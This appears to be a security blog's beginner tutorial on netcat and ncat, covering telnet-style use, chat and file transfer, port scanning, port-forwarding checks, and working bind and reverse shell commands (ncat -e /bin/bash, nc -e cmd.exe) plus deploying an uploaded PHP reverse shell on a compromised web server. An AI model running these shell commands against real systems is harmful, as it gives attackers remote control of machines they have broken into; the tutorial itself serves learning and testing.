Never Ending Security

It starts all here

Netcat Tutorial for Beginners


Netcat is a terminal application that is similar to the telnet program but has lot more features. Its a “power version” of the traditional telnet program. Apart from basic telnet functionas it can do various other things like creating socket servers to listen for incoming connections on ports, transfer files from the terminal etc. So it is a small tool that is packed with lots of features. Therefore its called the “Swiss-army knife for TCP/IP”.

The netcat manual defines netcat as

Netcat is a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable “back-end” device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities.

So basically netcat is a tool to do some bidirectional network communication over the TCP/UDP protocols. More technically speaking, netcat can act as a socket server or client and interact with other programs at the same time sending and receiving data through the network. Such a definition sounds too generic and make it difficult to understand what exactly this tool does and what is it useful for. This can be understood only by using and playing with it.

So the first thing to do would be to setup netcat on your machine. Netcat comes in various flavors. Means it is available from multiple vendors. But most of them have similar functionality. On ubuntu there are 3 packages called netcat-openbsd, netcat-traditional and ncat.

My preferred version is ncat. Ncat has been developed by the nmap team is the best of all netcats available and most importantly its cross platform and works very well on windows.

Ncat – Netcat for the 21st Century

Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses.

Download and install netcat


Windows version of netcat can be downloaded from
Simply download and extract the files somewhere suitable.

Or download ncat windows version


Ubuntu syntaptic package has netcat-openbsd and netcat-traditional packages available. Install both of them. Nmap also comes with a netcat implementation called ncat. Install that too.

Project websites

Install on Ubuntu

$ sudo apt-get install netcat-traditional netcat-openbsd nmap

To use netcat-openbsd implementation use “nc” command.
To use netcat-traditional implementation use “nc.traditional” command
To use nmap ncat use the “ncat” command.

In the following tutorial we are going to use all of them in different examples in different ways.

1. Telnet

The very first thing netcat can be used as is a telnet program. Lets see how.

$ nc -v 80

Now netcat is connected to on port 80 and its time to send some message. Lets try to fetch the index page. For this type “GET index.html HTTP/1.1” and hit the Enter key twice. Remember twice.

$ nc -v 80
Connection to 80 port [tcp/http] succeeded!
GET index.html HTTP/1.1

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 18 Aug 2012 06:03:04 GMT
Server: sffe
Content-Length: 219
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<H1>302 Moved</H1>
The document has moved
<A HREF="">here</A>.

The output from has been received and echoed on the terminal.

2. Simple socket server

To open a simple socket server type in the following command.

$ nc -l -v 1234

The above command means : Netcat listen to TCP port 1234. The -v option gives verbose output for better understanding. Now from another terminal try to connect to port 1234 using telnet command as follows :

$ telnet localhost 1234
Connected to localhost.
Escape character is '^]'.
ting tong

After connecting we send some test message like abc and ting tong to the netcat socket server. The netcat socket server will echo the data received from the telnet client.

$ nc -l -v 5555

Connection from port 5555 [tcp/rplay] accepted
ting tong

This is a complete Chatting System. Type something in netcat terminal and it will show up in telnet terminal as well. So this technique can be used for chatting between 2 machines.

Complete ECHO Server

Ncat with the -c option can be used to start a echo server. Source

Start the echo server using ncat as follows

$ ncat -v -l -p 5555 -c 'while true; do read i && echo [echo] $i; done'

Now from another terminal connect using telnet and type something. It will be send back with “[echo]” prefixed.
The netcat-openbsd version does not have the -c option. Remember to always use the -v option for verbose output.

Note : Netcat can be told to save the data to a file instead of echoing it to the terminal.

$ nc -l -v 1234 > data.txt

UDP ports

Netcat works with udp ports as well. To start a netcat server using udp ports use the -u option

$ nc -v -ul 7000

Connect to this server using netcat from another terminal

$ nc localhost -u 7000

Now both terminals can chat with each other.

3. File transfer

A whole file can be transferred with netcat. Here is a quick example.

One machine A – Send File

$ cat happy.txt | ncat -v -l -p 5555
Ncat: Version 5.21 ( )
Ncat: Listening on

In the above command, the cat command reads and outputs the content of happy.txt. The output is not echoed to the terminal, instead is piped or fed to ncat which has opened a socket server on port 5555.

On machine B – Receive File

$ ncat localhost 5555 > happy_copy.txt

In the above command ncat will connect to localhost on port 5555 and whatever it receives will be written to happy_copy.txt

Now happy_copy.txt will be a copy of happy.txt since the data being send over port 5555 is the content of happy.txt in the previous command.

Netcat will send the file only to the first client that connects to it. After that its over.
And after the first client closes down connection, netcat server will also close down the connection.

4. Port scanning

Netcat can also be used for port scanning. However this is not a proper use of netcat and a more applicable tool like nmap should be used.

$ nc -v -n -z -w 1 75-85
nc: connect to port 75 (tcp) failed: Connection refused
nc: connect to port 76 (tcp) failed: Connection refused
nc: connect to port 77 (tcp) failed: Connection refused
nc: connect to port 78 (tcp) failed: Connection refused
nc: connect to port 79 (tcp) failed: Connection refused
Connection to 80 port [tcp/*] succeeded!
nc: connect to port 81 (tcp) failed: Connection refused
nc: connect to port 82 (tcp) failed: Connection refused
nc: connect to port 83 (tcp) failed: Connection refused
nc: connect to port 84 (tcp) failed: Connection refused
nc: connect to port 85 (tcp) failed: Connection refused

The “-n” parameter here prevents DNS lookup, “-z” makes nc not receive any data from the server, and “-w 1” makes the connection timeout after 1 second of inactivity.

5. Remote Shell/Backdoor

Ncat can be used to start a basic shell on a remote system on a port without the need of ssh. Here is a quick example.

$ ncat -v -l -p 7777 -e /bin/bash

The above will start a server on port 7777 and will pass all incoming input to bash command and the results will be send back. The command basically converts the bash program into a server. So netcat can be used to convert any process into a server.

Connect to this bash shell using nc from another terminal

$ nc localhost 7777

Now try executing any command like help , ls , pwd etc.


On windows machine the cmd.exe (dos prompt program) is used to start a similar shell using netcat. The syntax of the command is same.

C:\tools\nc>nc -v -l -n -p 8888 -e cmd.exe
listening on [any] 8888 ...
connect to [] from (UNKNOWN) [] 1182

Now another console can connect using the telnet command

Although netcat though can be used to setup remote shells, is not useful to get an interactive shell on a remote system because in most cases netcat would not be installed on a remote system.

The most effective method to get a shell on a remote machine using netcat is by creating reverse shells.

6. Reverse Shells

This is the most powerful feature of netcat for which it is most used by hackers. Netcat is used in almost all reverse shell techniques to catch the reverse connection of shell program from a hacked system.

Reverse telnet

First lets take an example of a simple reverse telnet connection. In ordinate telnet connection the client connects to the server to start a communication channel.

Your system runs (# telnet server port_number)  =============> Server

Now using the above technique you can connect to say port 80 of the server to fetch a webpage. However a hacker is interested in getting a command shell. Its the command prompt of windows or the terminal of linux. The command shell gives ultimate control of the remote system. Now there is no service running on the remote server to which you can connect and get a command shell.

So when a hacker hacks into a system, he needs to get a command shell. Since its not possible directly, the solution is to use a reverse shell. In a reverse shell the server initiates a connection to the hacker’s machine and gives a command shell.

Step 1 : Hacker machine (waiting for incoming connection)
Step 2 : Server ==============> Hacker machine

To wait for incoming connections, a local socket listener has to be opened. Netcat/ncat can do this.
First a netcat server has to be started on local machine or the hacker’s machine.

machine A

$ ncat -v -l -p 8888
Ncat: Version 6.00 ( )
Ncat: Listening on :::8888
Ncat: Listening on

The above will start a socket server (listener) on port 8888 on local machine/hacker’s machine.

Now a reverse shell has to be launched on the target machine/hacked machine. There are a number of ways to launch reverse shells.

For any method to work, the hacker either needs to be able to execute arbitrary command on the system or should be able to upload a file that can be executed by opening from the browser (like a php script).

In this example we are not doing either of the above mentioned things. We shall just run netcat on the server also to throw a reverse command shell to demonstrate the concept. So netcat should be installed on the server or target machine.

Machine B :

$ ncat localhost 8888 -e /bin/bash

This command will connect to machine A on port 8888 and feed in the output of bash effectively giving a shell to machine A. Now machine A can execute any command on machine B.

Machine A

$ ncat -v -l -p 8888
Ncat: Version 5.21 ( )
Ncat: Listening on
Ncat: Connection from

In a real hacking/penetration testing scenario its not possible to run netcat on target machine. Therefore other techniques are employed to create a shell. These include uploading reverse shell php scripts and running them by opening them in browser. Or launching a buffer overflow exploit to execute reverse shell payload.


So in the above examples we saw how to use netcat for different network activities like telnet, reverse shells etc. Hackers mostly use it for creating quick reverse shells.

In this tutorial we covered some of the basic and common uses of netcat. Check out the wikipediaarticle for more information on what else netcat can do.

Php reverse shell with netcat

Once you are able to gain access to a remote website or server such that you can upload any arbitrary file to it, the next thing you want to try out is get a shell on the system. If the system is running php then a php file can be uploaded to it which will give us a reverse shell. There are many web based shell scripts but getting a terminal based shell is far more neater.

To get a shell on the system all we need is a reverse shell php script and a commandline tool called netcat. There are many php reverse shell scripts out there and we are going to try a few of them in this post. The first one that we are going to try is from pentestmonkey. You can download it from the website or check this gist.

Along with that php script you need netcat. I prefer the ncat utility from nmap suite which is very featureful and cross platform as well. Along with those 2 things you should also have apache+php installed to test the script and understand its working.

So first of all start a netcat listener. Reverse shells are based on the principle that the remote or hacked system will connect back to you. This back connection is accepted and handled by the netcat listener. Usage is simple

$ ncat -vv -n -l -p 1234

The above command is going to start a netcat listener on port number 1234. The l option means listener, the n option means no dns resolution, the p option means the port number and the vv option means verbose 2x. Once the listener starts ncat would report something like this

Ncat: Version 6.00 ( )
Ncat: Listening on :::1234
Ncat: Listening on

Next thing to do is initiate the php script. The php reverse shell script you downloaded in the above step, copy it to your apache web directory so that you can access it from the browser. The script needs 2 important configurations. That is the ip address and the port number it needs to connect to.

$VERSION = "1.0";
$ip = ''// CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;

Change the ip address to the ip address of your own machine, or the machine on which netcat is running. In our case, its localhost so would do. Port number should be the port netcat is listening to.

Now launch the script from a browser by opening the url http://localhost/reverse.php. reverse.php is the name of the script. The moment the script is opened in the browser netcat should receive the connection and show the details like this

Ncat: Connection from
Ncat: Connection from
Linux enlightened-desktop 3.5.0-26-generic #42-Ubuntu SMP Fri Mar 8 23:18:20 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
 17:15:46 up  7:04,  4 users,  load average: 0.08, 0.09, 0.14
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
enlighte tty7     :0               10:11    7:04m  5:18   0.05s /bin/sh /usr/bi
enlighte pts/0    :0               10:12   25:49   0.07s  0.00s ncat -vv -n -l
enlighte pts/3    :0               10:12    7:03m  0.00s  4.32s kdeinit4: kded4
enlighte pts/4    :0               17:15    0.00s  0.07s  0.00s wget http://loc
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

The last dollar sign indicates that the sh shell is ready to accept and run commands. The netcat output also shows some system details.

The browser wont show any output and would appear to load forever. The browser window can be closed and the shell would still remain running. This is because the script actually creates a separate process for the shell by forking. If you dont have a browser to trigger the php script, then use a commandline utility like wget to trigger the script.

$ wget http://localhost/reverse.php
--2013-04-12 17:15:46--  http://localhost/reverse.php
Resolving localhost (localhost)...
Connecting to localhost (localhost)||:80... connected.
HTTP request sent, awaiting response...

Just like the browser, wget will keep waiting for some output from the script. Once netcat receives the connection close the wget session as well.

Other php reverse shell scripts

There is another php reverse shell script hosted at github. Find it here. It generates a password protected reverse shell script using a username/password configuration. Other configuration options include the ip address and the port. Upload it to the target system and launch from browser.

And then comes the most powerful one, called weevely.

Weevely is a PHP web shell that provides a telnet-like console to execute system commands and automatize administration and post-exploitation tasks.

Weevely has lots more inbuilt features that can automate various post exploitation tasks. In short, it is more than just a console. Check it out here.


Since the php script connects back to us, it is important that no firewall on our own system blocks it. For example a firewall like firestarter on linux or zonealarm on windows might block incoming connections like that. So first make sure that ports on your local system are reachable and connectable. Also if you are on a LAN behind a router then you need to configure port forwarding properly.

To test your ports, after launching netcat listener use this port testing tool. If your ports are connectable from the outer internet then they are OK.

Check port forwarding with netcat

Port forwarding is a configuration in the router of a LAN such that any connections to a specific port number on the public/wan ip of the router may be forwarded to a specific machine/ip inside the LAN. Most routers allow configuration options to set port forwarding.

After setting up port forwarding its necessary to check if its working or not. To check port forwarding 2 things are necessary :

1. An application on local computer must open the port and wait for connections.
2. A machine from the outer network/internet must try to connect to this port number via the router.

If the connection succeeds then port forwarding is working. Lets take an example. A Lan has a router and 2 PCs with ip addresses and respectively. Now the router is configured to forward port 5000 to machine

Now to test that port forwarding we first need to start an application on machine that will open the port 5000. We can use the program called netcat for this. Just run the following command

$ nc -vv -l 5000

This will make netcat listen on port 5000. Now use a remote website to connect to this port using the public ip address of the router. Few free tools are

Just enter your public ip address and the port number and click Check. If the website is shows success then the netcat terminal will show a new connection message like the following

$ nc -vv -l 6000
Connection from port 6000 [tcp/x11] accepted

This will confirm that port forwarding is working. If the website shows that port is closed then netcat too would not show any such connection message indicating that port forwarding to that particular port is not working.

There may be a number of reason why port forwarding didnt work. One common reason is the existance of a firewall on local system. For example zonealarm on windows, or firestarter on ubuntu/linux. Firewalls block incoming connections on local machines and need to be configured properly. So configure your firewall to allowing incoming connections to the particular port.

Udp telnet with netcat

The standard telnet utilities that ship with linux or windows allow to telnet to services running on TCP ports. They do not support udp ports. However the utility netcat can be used for working with udp ports in a very similar manner to default telnet utility.

The telnet utility works like this

$ telnet localhost 7000

where localhost is the hostname and 7000 is the port number. For udp ports the syntax for netcat is very similar

$ netcat localhost 7000 -u

The -u option indicates udp port.


Leave a Reply

Please log in using one of these methods to post your comment: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s